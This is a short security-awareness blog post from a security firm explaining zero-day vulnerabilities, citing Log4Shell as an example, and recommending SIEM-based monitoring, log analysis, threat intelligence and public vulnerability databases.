In recognition of Cyber Security Awareness Month, RedLegg’s 96 Bravo team will be providing security focused content for the Information Security community, in hopes of proactively fostering a security conscious mindset. In this week’s diary, we’ll highlight the importance of understanding Zero-Day Vulnerabilities.
Understanding Zero-Day Vulnerabilities
In a perfect world, vulnerabilities are reported promptly and ethically, allowing vendors a reasonable timeframe to develop and release patching. The reality is vulnerabilities are practically inherent. Moreover, there is a distinct classification of vulnerabilities that are obscure to the general public, known as zero-day vulnerabilities. These vulnerabilities are disclosed to the public before security engineers have a patch developed. This gives the developers zero days to respond to the security flaw and allows attackers to exploit it at will.
Log4J: Log4J is a more recent zero-day vulnerability that impacted Apache’s Log4J software library, specifically “Log4Shell”. Log4J is a critical remote code execution (RCE) vulnerability, commonly used in many applications, organizations, and technical products. The broad use of this software component facilitated a considerably more widespread attack.
Security Monitoring – this is centered around the collection and analysis of potential security threats using automated processes and tools such as a SIEM.
- Proactively defending against zero-day vulnerabilities begins with the collection of pertinent application logs and telemetry data via SIEM consumption.
- Proper log analysis will adopt an agile characteristic by leveraging tabulated log management with effective triaging skills.
- Enhanced visibility entails progressive reporting, management, and clarity on the systems/programs that are in operation and permitted across the network.
- A robust approach will also include threat intelligence to aid in quickly responding to vulnerabilities and prioritizing incoming risks.
This Cybersecurity Awareness Month, consider ways you can #seeyourselfincyber! Listed below are open-sourced resources for the latest updates on vulnerabilities:
The NVD is a comprehensive publicly available database of reported known vulnerabilities.
- o The Cybersecurity & Infrastructure Security Agency (CISA) publishes vulnerabilities that are actively being exploited in real-time.